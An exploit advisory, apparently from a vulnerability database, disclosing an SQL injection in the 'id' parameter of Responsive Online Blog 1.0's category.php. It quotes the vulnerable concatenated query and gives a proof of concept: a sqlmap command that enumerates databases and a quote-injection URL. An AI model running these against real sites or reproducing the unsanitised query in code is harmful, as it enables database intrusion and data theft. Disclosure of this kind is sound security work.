Responsive Online Blog 1.0 SQL Injection

2020.06.24

Credit: Eren Simsek

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection
# Date: 2020-06-23
# Exploit Author: Eren Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL
# Version: v1.0
# Tested on: Linux - Wamp Server
>Vulnerable File
/category.php
>Vulnerable Code
$id=$_REQUEST['id'];
$query="SELECT * from blog_categories where id='".$id."'";
Id parameter enters sql query without any changes
>Proof Of Concept
sqlmap 'http://localhost/resblog/category.php?id=1' --dbs --batch
OR
http://TARGET/resblog/category.php?id=1' Single Quote will cause SQL error

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Responsive Online Blog 1.0 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.